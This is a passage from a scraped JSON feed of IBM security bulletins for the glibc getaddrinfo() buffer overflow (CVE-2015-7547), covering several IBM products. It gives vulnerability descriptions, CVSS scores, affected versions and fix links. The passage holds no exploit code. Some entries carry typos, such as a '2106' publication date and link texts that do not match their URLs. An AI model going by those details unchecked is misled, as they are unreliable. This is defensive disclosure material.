http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v2 Guide](<http://www.first.org/cvss/v2/guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v2](<http://nvd.nist.gov/CVSS-v2-Calculator> \"Link resides outside of ibm.com\" )\n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n11 March 2016: Original Version Published\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. \"Affected Products and Versions\" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.\n\n[{\"Product\":{\"code\":\"SSHLHV\",\"label\":\"IBM Security Network Protection\"},\"Business Unit\":{\"code\":\"BU008\",\"label\":\"Security\"},\"Component\":\"Documentation\",\"Platform\":[{\"code\":\"PF009\",\"label\":\"Firmware\"}],\"Version\":\"5.3.1;5.3.2\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB24\",\"label\":\"Security Software\"}}]", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-16T21:39:53", "type": "ibm", "title": "Security Bulletin: GNU C library (glibc) vulnerability affects IBM Security Network Protection (CVE-2015-7547)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7547"], "modified": "2018-06-16T21:39:53", "id": "DF2BD5A9760617F387DDBFB4D43BD83DA3301F8FFA9F60E10B1612C71BB3BA3D", "href": "https://www.ibm.com/support/pages/node/542645", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-28T22:13:48", "description": "## Summary\n\nA GNU C library (glibc) stack-based buffer overflow in getaddrinfo() vulnerability affects IBM Security Network Active Bypass\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2015-7547_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7547>)** \nDESCRIPTION:** GNU C Library (glibc) is vulnerable to a stack-based buffer overflow, caused by improper bounds checking by the nss_dns backend for the getaddrinfo() function when performing dual A/AAAA DNS queries. By sending a specially crafted DNS response, a remote attacker could overflow a buffer and execute arbitrary code on the system or cause the application to crash. \nCVSS Base Score: 8.1 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/110662_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/110662>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H) \n\n## Affected Products and Versions\n\nProducts: ABYP-0T-0S-4L-P, ABYP-0T-0S-4L-P-M, ABYP-0T-2S-2L-P, ABYP-0T-2S-2L-P-M, ABYP-0T-4S-0L-P, ABYP-0T-4S-0L-P-M, ABYP-10G-2SR-2LR-1-P, ABYP-10G-2SR-2LR-1-P-M, ABYP-10G-4LR-1-P, ABYP-10G-4LR-1-P-M, ABYP-10G-4SR-1-P, ABYP-10G-4SR-1-P-M, ABYP-2T-0S-2L-P, ABYP-2T-0S-2L-P-M, ABYP-2T-1S-1L-P, ABYP-2T-1S-1L-P-M, ABYP-2T-2S-0L-P, ABYP-2T-2S-0L-P-M, ABYP-4T-0S-0L-P, ABYP-4T-0S-0L-P-M, ABYP-4TL-P, ABYP-4TL-P-M, ABYP-4TS-P, ABYP-4TS-P-M \n \nFirmware versions: \n1G NAB - 2.15-36, 2.16-37, 2.18-43, 3.4-23, 3.9-34, 3.13-41, 3.18-49, 3.25-57, 3.29-9, 3.30-12, 3.30.0-13, 3.30.2-9, 3.30.4-12 \n10G NAB - 1.0.1876, 1.0.2919, 0343c3c, 2.11-28, 2.13-34, 2.15-36, 2.18-42, 3.4-23, 3.9-34, 3.13-41, 3.18-49, 3.25-57, 3.29-9, 3.30-12, 3.30.0-13, 3.30.2-9, 3.30.4-12\n\n## Remediation/Fixes\n\n_Product_\n\n| _VRMF_| _Remediation/First Fix_ \n---|---|--- \n**IBM Security Proventia Network Active Bypass**| 3.X| [Proventia 1G NAB Update 19 (fw 3.30.4-12)](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=Security%2BSystems&product=ibm/Tivoli/IBM+Security+Network+Active+Bypass&release=All&platform=Windows&function=fixId&fixids=20160425_Proventia_1G_Network_Active_Bypass_update-19_fw3.30.4-12&includeSupersedes=0&source=fc>) \n**IBM Security Proventia Network Active Bypass**| _3.X_| [](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Security%2BSystems&product=ibm/Tivoli/Proventia+Network+Multi-Function+Security&release=All&platform=All&function=all>)[Proventia 10G NAB Update 16 (fw 3.30.4-12)](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=Security%2BSystems&product=ibm/Tivoli/IBM+Security+Network+Active+Bypass&release=All&platform=Windows&function=fixId&fixids=20160425_Proventia_10G_Network_Active_Bypass_update-16_fw3.30.4-12&includeSupersedes=0&source=fc>) \n \nfor IBM Security Proventia Network Active Bypass products at Firmware versions: \n \n1G NAB - 2.15-36, 2.16-37, 2.18-43, 3.4-23, 3.9-34, 3.13-41, 3.18-49, 3.25-57, 3.29-9, 3.30-12, 3.30.0-13, 3.30.2-9 \n10G NAB - 1.0.1876, 1.0.2919, 0343c3c, 2.11-28, 2.13-34, 2.15-36, 2.18-42, 3.4-23, 3.9-34, 3.13-41, 3.18-49, 3.25-57, 3.29-9, 3.30-12, 3.30.0-13, 3.30.2-9 \n\n\nIBM recommends upgrading to 3.30.4-12, the supported firmware release of the product. \n\n \n \nOnce updates have been applied, the appliance will reboot automatically. For more information follow update readme instructions. \n \nIBM recommends that you review your entire environment to identify vulnerable releases of glibc including your Operating Systems and take appropriate mitigation and remediation actions. Please contact your Operating System provider for more information. \n\n## Workarounds and Mitigations\n\nnone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v2 Guide](<http://www.first.org/cvss/v2/guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v2](<http://nvd.nist.gov/CVSS-v2-Calculator> \"Link resides outside of ibm.com\" )\n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\nApril 29, 2106: Original Version Published\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. \"Affected Products and Versions\" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.\n\n[{\"Product\":{\"code\":\"SSB2MD\",\"label\":\"IBM Security Network Active Bypass\"},\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Component\":\"--\",\"Platform\":[{\"code\":\"PF009\",\"label\":\"Firmware\"}],\"Version\":\"3.0\",\"Edition\":\"All Editions\",\"Line of Business\":{\"code\":\"LOB24\",\"label\":\"Security Software\"}}]", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-16T21:41:40", "type": "ibm", "title": "Security Bulletin: GNU C library (glibc) vulnerability affects IBM Security Network Active Bypass (CVE-2015-7547)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7547"], "modified": "2018-06-16T21:41:40", "id": "7B8432DD8520D3949A96EEA5A92470BE8D0BA4F2BB13B9B9BD82903947E9225F", "href": "https://www.ibm.com/support/pages/node/277857", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-28T22:15:44", "description": "## Summary\n\nIBM SmartCloud Entry is vulnerable to a glic vulnerability, which allows a romote attacker overflow a buffer and cause the application to crash.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2015-7547_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7547>)** \nDESCRIPTION:** GNU C Library (glibc) is vulnerable to a stack-based buffer overflow, caused by improper bounds checking by the nss_dns backend for the getaddrinfo() function when performing dual A/AAAA DNS queries. By sending a specially crafted DNS response, a remote attacker could overflow a buffer and execute arbitrary code on the system or cause the application to crash. \nCVSS Base Score: 8.1 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/110662_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/110662>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H) \n\n## Affected Products and Versions\n\nIBM SmartCloud Entry 2.2.0 through 2.2.0.4 Appliance fix pack 4 \nIBM SmartCloud Entry 2.3.0 through 2.3.0.4 Appliance fix pack 4 \nIBM SmartCloud Entry 2.4.0 through 2.4.0.4 Appliance fix pack 4 \nIBM SmartCloud Entry 3.1.0 through 3.1.0.4 Appliance fix pack 18 \nIBM SmartCloud Entry 3.2.0 through 3.2.0.4 Appliance fix pack 18\n\n## Remediation/Fixes\n\nProduct\n\n| VRMF| APAR| Remediation/First Fix \n---|---|---|--- \nIBM SmartCloud Entry| 2.2| None| IBM SmartCloud Entry 2.2.0 Appliance fix pack 5: \n[http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Other%2Bsoftware&amp;product=ibm/Other+software/IBM+Starter+Kit+for+Cloud&amp;release=All&amp;platform=All&amp;function=fixId&amp;fixids=2.2.0.4-IBM-SKC_APPL-FP005&amp;includeSupersedes=0](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Other%2Bsoftware&product=ibm/Other+software/IBM+Starter+Kit+for+Cloud&release=All&platform=All&function=fixId&fixids=2.2.0.4-IBM-SKC_APPL-FP004&includeSupersedes=0>) \nIBM SmartCloud Entry| 2.3| None| IBM SmartCloud Entry 2.3.0 Appliance fix pack 5: \n[http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Other%2Bsoftware&amp;product=ibm/Other+software/IBM+SmartCloud+Entry&amp;release=All&amp;platform=All&amp;function=fixId&amp;fixids=+2.3.0.4-IBM-SCE_APPL-FP005+&amp;includeSupersedes=0](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Other%2Bsoftware&product=ibm/Other+software/IBM+SmartCloud+Entry&release=All&platform=All&function=fixId&fixids=+2.3.0.4-IBM-SCE_APPL-FP004&includeSupersedes=0>) \nIBM SmartCloud Entry| 2.4| None| IBM SmartCloud Entry 2.4.0 Appliance fix pack 5: \n[http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Other%2Bsoftware&amp;product=ibm/Other+software/IBM+SmartCloud+Entry&amp;release=All&amp;platform=All&amp;function=fixId&amp;fixids=+2.4.0.4-IBM-SCE_APPL-FP005+&amp;includeSupersedes=0](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Other%2Bsoftware&product=ibm/Other+software/IBM+SmartCloud+Entry&release=All&platform=All&function=fixId&fixids=+2.4.0.4-IBM-SCE_APPL-FP004+&includeSupersedes=0>) \nIBM SmartCloud Entry| 3.1| None| IBM SmartCloud Entry 3.1.0 Appliance fix pack 19: \n[http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Other%2Bsoftware&amp;product=ibm/Other+software/IBM+SmartCloud+Entry&amp;release=3.1.0&amp;platform=All&amp;function=fixId&amp;fixids=+3.1.0.4-IBM-SCE_APPL-FP19+&amp;includeSupersedes=0](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Other%2Bsoftware&product=ibm/Other+software/IBM+SmartCloud+Entry&release=3.1.0&platform=All&function=fixId&fixids=+3.1.0.4-IBM-SCE_APPL-FP18+&includeSupersedes=0>) \nIBM SmartCloud Entry| 3.2| None| IBM SmartCloud Entry 3.2.0 Appliance fix pack 19:[](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Other%2Bsoftware&product=ibm/Other+software/IBM+SmartCloud+Entry&release=All&platform=All&function=fixId&fixids=+3.2.0.4-IBM-SCE_APPL-FP18+&includeSupersedes=0>) \n[http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Other%2Bsoftware&amp;product=ibm/Other+software/IBM+SmartCloud+Entry&amp;release=All&amp;platform=All&amp;function=fixId&amp;fixids=+3.2.0.4-IBM-SCE_APPL-FP19+&amp;includeSupersedes=0](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Other%2Bsoftware&product=ibm/Other+software/IBM+SmartCloud+Entry&release=All&platform=All&function=fixId&fixids=+3.2.0.4-IBM-SCE_APPL-FP18+&includeSupersedes=0>) \n \n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v2 Guide](<http://www.first.org/cvss/v2/guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v2](<http://nvd.nist.gov/CVSS-v2-Calculator> \"Link resides outside of ibm.com\" )\n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\nMarch 11, 2016: Original version published\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. \"Affected Products and Versions\" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.\n\n[{\"Product\":{\"code\":\"SST55W\",\"label\":\"IBM Cloud Manager with OpenStack\"},\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Component\":\"Not Applicable\",\"Platform\":[{\"code\":\"PF016\",\"label\":\"Linux\"}],\"Version\":\"2.3;2.4;3.1;3.2\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB10\",\"label\":\"Data and AI\"}}]", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-07-19T00:49:12", "type": "ibm", "title": "Security Bulletin: glibc getaddrinfo stack-based buffer overflow (CVE-2015-7547)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7547"], "modified": "2020-07-19T00:49:12", "id": "07C98FF3003D3C882D6D221E7B29364598F31BB7789A307B39FFD065F50D7DAD", "href": "https://www.ibm.com/support/pages/node/628327", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-28T22:15:55", "description": "## Summary\n\nIBM Software Delivery and Lifecycle Patterns requires client action for the glibc vulnerabilities. \nThe GNU C Library (glibc) is vulnerable to a heap-based buffer overflow, a local attacker could exploit this vulnerability to overflow a buffer and execute arbitrary code on the system with root privileges. \nGNU C Library (glibc) is vulnerable to a stack-based buffer overflow. By sending a specially crafted DNS response, a remote attacker could overflow a buffer and execute arbitrary code on the system or cause the application to crash. \n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2015-7547_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7547>)** \nDESCRIPTION:** GNU C Library (glibc) is vulnerable to a stack-based buffer overflow, caused by improper bounds checking by the nss_dns backend for the getaddrinfo() function when performing dual A/AAAA DNS queries. By sending a specially crafted DNS response, a remote attacker could overflow a buffer and execute arbitrary code on the system or cause the application to crash. \nCVSS Base Score: 8.1 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/110662_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/110662>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H) \n\n\n## Affected Products and Versions\n\nIBM Software Delivery and Lifecycle Patterns 1.0 and 1.0.1\n\n## Remediation/Fixes\n\nIBM strongly recommends you should contact Red Hat to obtain and install fixes for Red Hat Enterprise Linux 6.4. \n \nAlternatively, if you have access to a Yum update repository, you may update the glibc library by using the command: yum update glibc \n \nAfter the update is applied you need to reboot the system or restart all affected services.\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v2 Guide](<http://www.first.org/cvss/v2/guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v2](<http://nvd.nist.gov/CVSS-v2-Calculator> \"Link resides outside of ibm.com\" )\n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. \"Affected Products and Versions\" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.\n\n[{\"Product\":{\"code\":\"SSUKF8\",\"label\":\"IBM Software Delivery and Lifecycle Patterns\"},\"Business Unit\":{\"code\":\"BU053\",\"label\":\"Cloud &amp; Data Platform\"},\"Component\":\"General Information\",\"Platform\":[{\"code\":\"PF016\",\"label\":\"Linux\"}],\"Version\":\"1.0;1.0.1\",\"Edition\":\"All Editions\",\"Line of Business\":{\"code\":\"LOB45\",\"label\":\"Automation\"}}]", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-17T05:10:05", "type": "ibm", "title": "Security Bulletin: IBM Software Delivery and Lifecycle Patterns for the glibc vulnerabilities (CVE-2015-7547)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7547"], "modified": "2018-06-17T05:10:05", "id": "8CB034EC6C7868DFE21F2D403926D13C437E7B3AFD801B320D74F5F4D6766556", "href": "https://www.ibm.com/support/pages/node/542759", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-28T22:13:16", "description": "## Summary\n\nA GNU C library (glibc) stack-based buffer overflow in getaddrinfo() vulnerability affects IBM Identity Security Governance \n\n## Vulnerability Details\n\n**CVEID:** [CVE-2015-7547](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7547>) \n \n**DESCRIPTION:** GNU C Library (glibc) is vulnerable to a stack-based buffer overflow, caused by improper bounds checking by the nss_dns backend for the getaddrinfo() function when performing dual A/AAAA DNS queries. By sending a specially crafted DNS response, a remote attacker could overflow a buffer and execute arbitrary code on the system or cause the application to crash. \n \nCVSS Base Score: 8.1 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/110662> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nIBM Security Identity Governance and Intelligence 5.2\n\n## Remediation/Fixes\n\nIBM Security Identity Governance and Intelligence\n\n| 5.2| None| [ 5.2.0.1-ISS-SIGI-GLIBC ](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Security%2BSystems&product=ibm/Tivoli/IBM+Security+Identity+Governance&release=5.2.0.0&platform=Linux&function=all>) \n---|---|---|--- \n \n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v2 Guide](<http://www.first.org/cvss/v2/guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v2](<http://nvd.nist.gov/CVSS-v2-Calculator> \"Link resides outside of ibm.com\" )\n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## 